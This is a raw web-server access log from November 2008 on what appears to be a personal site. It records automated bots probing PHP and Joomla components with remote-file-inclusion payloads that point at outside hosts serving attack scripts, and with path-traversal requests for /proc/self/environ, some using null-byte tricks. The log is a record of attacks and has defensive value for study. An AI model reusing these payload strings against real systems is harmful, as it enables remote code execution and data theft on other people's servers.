64.106.143.80 - - [03/Nov/2008:07:18:14 -0600] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.hexapharm.com/extranet/files/8/id.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
69.94.108.111 - - [03/Nov/2008:07:20:29 -0600] "GET /logs/access_log.1212883200//com_rwcards%22http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 368 "-""libwww-perl/5.803"
69.94.108.111 - - [03/Nov/2008:07:20:29 -0600] "GET //com_rwcards%22http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
69.94.108.111 - - [03/Nov/2008:07:20:29 -0600] "GET /logs//com_rwcards%22http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
190.5.195.145 - - [03/Nov/2008:07:20:30 -0600] "GET /logs//htmltonuke.php?filnavn=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
190.5.195.145 - - [03/Nov/2008:07:20:30 -0600] "GET //htmltonuke.php?filnavn=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
207.139.167.49 - - [03/Nov/2008:07:24:15 -0600] "GET /logs/access_log.1214179200%22%20%20lang=%22en%22%3ETomdolan.pconline.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/nl.babelfish.yahoo.com/translate_url?trurl=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1214179200&lp=en_nl&.intl=nl&fr=sfp%22%20target=%22_blank%22%3EVertaal%20deze%20pagina%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22en%22%3EHTTP/1.1%22%20404%20297%20%22-%22%22libwww-perl/5.65%22%2061.142.80.108%20-%20-%20[22/Jun/2008:19:04:09%20...%20search?hl=pt-BR&safe=off&client=firefox-a&rls=org.mozilla%3Apt-BR%3Aofficial&hs%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1214179200%3C/span%3E%20-%20%3Cem%3E450k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/nl.wrs.yahoo.com/_ylt=A0geupGO9A5JTWUBblVzKAx.;_ylu=X3oDMTB0NjNnOHM2BHNlYwNzcgRwb3MDNzkzBGNvbG8DYWMyBHZ0aWQD/SIG=12a1tq4ou/EXP=1225803278/**http%3a/forum.pipni.cz/read.php%3ff=2%26i=4477%26t=4477//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 425 "-""libwww-perl/5.805"
207.139.167.49 - - [03/Nov/2008:07:24:15 -0600] "GET /logs/access_log.1214179200%22%20%20lang=%22en%22%3ETomdolan.pconline.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/nl.babelfish.yahoo.com/translate_url?trurl=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1214179200&lp=en_nl&.intl=nl&fr=sfp%22%20target=%22_blank%22%3EVertaal%20deze%20pagina%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22en%22%3EHTTP/1.1%22%20404%20297%20%22-%22%22libwww-perl/5.65%22%2061.142.80.108%20-%20-%20[22/Jun/2008:19:04:09%20...%20search?hl=pt-BR&safe=off&client=firefox-a&rls=org.mozilla%3Apt-BR%3Aofficial&hs%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1214179200%3C/span%3E%20-%20%3Cem%3E450k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/nl.wrs.yahoo.com/_ylt=A0geupGO9A5JTWUBblVzKAx.;_ylu=X3oDMTB0NjNnOHM2BHNlYwNzcgRwb3MDNzkzBGNvbG8DYWMyBHZ0aWQD/SIG=12a1tq4ou/EXP=1225803278/**http%3a/forum.pipni.cz//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 425 "-""libwww-perl/5.805"
207.139.167.49 - - [03/Nov/2008:07:24:15 -0600] "GET /logs/access_log.1216425600%22%20%20lang=%22en%22%3Etomdolan.pconline.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/nl.babelfish.yahoo.com/translate_url?trurl=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1216425600&lp=en_nl&.intl=nl&fr=sfp%22%20target=%22_blank%22%3EVertaal%20deze%20pagina%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22en%22%3E89.188.110.128%20-%20-%20[18/Jul/2008:19:00:38%20-0500]%20%22GET%20/include/write.php?dir%20...%20HTTP/1.1%22%20404%20302%20%22-%22%22libwww-perl/5.805%22%2058.69.172.67%20-%20-%20[18/Jul/2008:19:01:43%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1216425600%3C/span%3E%20-%20%3Cem%3E528k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/nl.wrs.yahoo.com/_ylt=A0geupGO9A5JTWUBclVzKAx.;_ylu=X3oDMTB0NmZtZmN1BHNlYwNzcgRwb3MDNzk3BGNvbG8DYWMyBHZ0aWQD/SIG=120n1ubbq/EXP=1225803278/**http%3a/stowmaszrol.com.pl/papierowa-rocznica//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 425 "-""libwww-perl/5.805"
207.139.167.49 - - [03/Nov/2008:07:24:15 -0600] "GET /logs/access_log.1216425600%22%20%20lang=%22en%22%3Etomdolan.pconline.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/nl.babelfish.yahoo.com/translate_url?trurl=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1216425600&lp=en_nl&.intl=nl&fr=sfp%22%20target=%22_blank%22%3EVertaal%20deze%20pagina%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22en%22%3E89.188.110.128%20-%20-%20[18/Jul/2008:19:00:38%20-0500]%20%22GET%20/include/write.php?dir%20...%20HTTP/1.1%22%20404%20302%20%22-%22%22libwww-perl/5.805%22%2058.69.172.67%20-%20-%20[18/Jul/2008:19:01:43%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1216425600%3C/span%3E%20-%20%3Cem%3E528k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/nl.wrs.yahoo.com/_ylt=A0geupGO9A5JTWUBclVzKAx.;_ylu=X3oDMTB0NmZtZmN1BHNlYwNzcgRwb3MDNzk3BGNvbG8DYWMyBHZ0aWQD/SIG=120n1ubbq/EXP=1225803278/**http%3a/stowmaszrol.com.pl//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 425 "-""libwww-perl/5.805"
64.38.4.3 - - [03/Nov/2008:07:25:35 -0600] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
64.38.4.3 - - [03/Nov/2008:07:25:35 -0600] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
65.55.25.136 - - [03/Nov/2008:07:27:20 -0600] "GET /tattoo/ HTTP/1.1" 200 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.25.136 - - [03/Nov/2008:07:29:43 -0600] "GET /tattoo/set3.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
190.5.195.145 - - [03/Nov/2008:07:33:21 -0600] "GET /logs/access_log.1214438400//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.76"
190.5.195.145 - - [03/Nov/2008:07:33:21 -0600] "GET //htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
190.5.195.145 - - [03/Nov/2008:07:33:21 -0600] "GET /logs//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.76"
190.5.195.145 - - [03/Nov/2008:07:36:18 -0600] "GET /logs//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.76"
190.5.195.145 - - [03/Nov/2008:07:36:18 -0600] "GET //htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
65.254.56.170 - - [03/Nov/2008:07:37:19 -0600] "GET /logs/errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
65.254.56.170 - - [03/Nov/2008:07:37:19 -0600] "GET /logs//phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 314 "-""XXXXXX"
65.254.56.170 - - [03/Nov/2008:07:37:19 -0600] "GET /logs//phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=http://clusty.com/search??? HTTP/1.1" 404 314 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
65.254.56.170 - - [03/Nov/2008:07:37:19 -0600] "GET /logs//phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-""XXXXXX"
65.254.56.170 - - [03/Nov/2008:07:37:19 -0600] "GET //phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=http://clusty.com/search??? HTTP/1.1" 404 309 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
65.254.56.170 - - [03/Nov/2008:07:37:19 -0600] "GET /errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
65.254.56.170 - - [03/Nov/2008:07:37:19 -0600] "GET //phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 309 "-""XXXXXX"
65.254.56.170 - - [03/Nov/2008:07:37:19 -0600] "GET //phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 309 "-""XXXXXX"
219.85.63.226 - - [03/Nov/2008:07:40:30 -0600] "GET //poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
219.85.63.226 - - [03/Nov/2008:07:40:30 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
219.85.63.226 - - [03/Nov/2008:07:40:52 -0600] "GET //poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
219.85.63.226 - - [03/Nov/2008:07:40:53 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
121.149.134.114 - - [03/Nov/2008:07:41:11 -0600] "GET /logs//ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 324 "-""Avant Browser (http://www.avantbrowser.com)"
121.149.134.114 - - [03/Nov/2008:07:41:11 -0600] "GET /logs/access_log.1214179200//ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 346 "-""Avant Browser (http://www.avantbrowser.com)"
121.149.134.114 - - [03/Nov/2008:07:41:11 -0600] "GET //ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 319 "-""Avant Browser (http://www.avantbrowser.com)"
94.23.0.147 - - [03/Nov/2008:07:41:41 -0600] "GET /logs/errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
94.23.0.147 - - [03/Nov/2008:07:41:41 -0600] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://clusty.com/search??? HTTP/1.1" 404 362 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
94.23.0.147 - - [03/Nov/2008:07:41:41 -0600] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 362 "-""XXXXXX"
94.23.0.147 - - [03/Nov/2008:07:41:41 -0600] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 362 "-""XXXXXX"
94.23.0.147 - - [03/Nov/2008:07:41:41 -0600] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://clusty.com/search??? HTTP/1.1" 404 357 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
94.23.0.147 - - [03/Nov/2008:07:41:41 -0600] "GET /errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
94.23.0.147 - - [03/Nov/2008:07:41:42 -0600] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 357 "-""XXXXXX"
94.23.0.147 - - [03/Nov/2008:07:41:42 -0600] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 357 "-""XXXXXX"
219.85.63.226 - - [03/Nov/2008:07:43:17 -0600] "GET //poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:07:43:19 -0600] "GET /logs/access_log.1217548800//poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:07:43:19 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:07:43:19 -0600] "GET /logs/access_log.1217289600//poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:07:43:37 -0600] "GET //poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:07:43:37 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:07:43:37 -0600] "GET /logs/access_log.1217548800//poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:07:43:39 -0600] "GET /logs/access_log.1217289600//poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:07:44:21 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
219.85.63.226 - - [03/Nov/2008:07:44:21 -0600] "GET /logs/access_log.1217548800//poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
219.85.63.226 - - [03/Nov/2008:07:44:21 -0600] "GET //poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
219.85.63.226 - - [03/Nov/2008:07:44:22 -0600] "GET /logs/access_log.1217289600//poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
220.80.108.140 - - [03/Nov/2008:07:45:01 -0600] "GET /logs/access_log.1214179200//ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
220.80.108.140 - - [03/Nov/2008:07:45:01 -0600] "GET /logs//ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
220.80.108.140 - - [03/Nov/2008:07:45:04 -0600] "GET //ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
203.86.233.109 - - [03/Nov/2008:07:46:54 -0600] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
203.86.233.109 - - [03/Nov/2008:07:46:55 -0600] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
219.85.63.226 - - [03/Nov/2008:07:48:36 -0600] "GET //poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:07:48:36 -0600] "GET /logs/access_log.1217548800//poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:07:48:36 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:07:49:28 -0600] "GET /logs/access_log.1217548800//poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:07:49:28 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:07:49:28 -0600] "GET //poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:07:49:38 -0600] "GET /logs/access_log.1217289600//poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:07:49:43 -0600] "GET /logs/access_log.1217289600//poll/poll_ssi.php?include_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
206.225.91.21 - - [03/Nov/2008:07:50:15 -0600] "GET /logs/pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://www.cemsantjoan.cat/administrator/components/com_juser/id.txt????? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
206.225.91.21 - - [03/Nov/2008:07:50:15 -0600] "GET /pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://www.cemsantjoan.cat/administrator/components/com_juser/id.txt????? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
85.214.61.186 - - [03/Nov/2008:07:52:42 -0600] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.65.1.253 - - [03/Nov/2008:07:54:12 -0600] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
216.65.1.253 - - [03/Nov/2008:07:54:12 -0600] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
216.65.1.253 - - [03/Nov/2008:07:54:12 -0600] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
216.65.1.253 - - [03/Nov/2008:07:54:12 -0600] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
88.84.157.127 - - [03/Nov/2008:07:54:14 -0600] "GET /logs/%20home.php?action=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""XXXXXX"
88.84.157.127 - - [03/Nov/2008:07:54:14 -0600] "GET /logs/%20home.php?action=http://clusty.com/search??? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [03/Nov/2008:07:54:14 -0600] "GET /logs/errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [03/Nov/2008:07:54:15 -0600] "GET /logs/%20home.php?action=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""XXXXXX"
88.84.157.127 - - [03/Nov/2008:07:54:15 -0600] "GET /%20home.php?action=http://clusty.com/search??? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [03/Nov/2008:07:54:15 -0600] "GET /errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [03/Nov/2008:07:54:15 -0600] "GET /%20home.php?action=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""XXXXXX"
88.84.157.127 - - [03/Nov/2008:07:54:16 -0600] "GET /%20home.php?action=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""XXXXXX"
190.5.195.145 - - [03/Nov/2008:07:56:38 -0600] "GET /logs/access_log.1214179200//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.76"
190.5.195.145 - - [03/Nov/2008:07:56:39 -0600] "GET //htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
190.5.195.145 - - [03/Nov/2008:07:56:39 -0600] "GET /logs//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.76"
213.189.20.26 - - [03/Nov/2008:07:58:06 -0600] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
213.189.20.26 - - [03/Nov/2008:07:58:06 -0600] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
213.189.20.26 - - [03/Nov/2008:07:58:09 -0600] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
213.189.20.26 - - [03/Nov/2008:07:58:09 -0600] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
190.5.195.145 - - [03/Nov/2008:07:58:15 -0600] "GET /logs/access_log.1214438400//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.76"
59.125.183.76 - - [03/Nov/2008:07:58:58 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
59.125.183.76 - - [03/Nov/2008:07:58:58 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
59.125.183.76 - - [03/Nov/2008:07:58:59 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
59.125.183.76 - - [03/Nov/2008:07:58:59 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
206.225.91.21 - - [03/Nov/2008:07:59:27 -0600] "GET //?pm_path=http://www.cemsantjoan.cat/administrator/components/com_juser/id.txt????? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
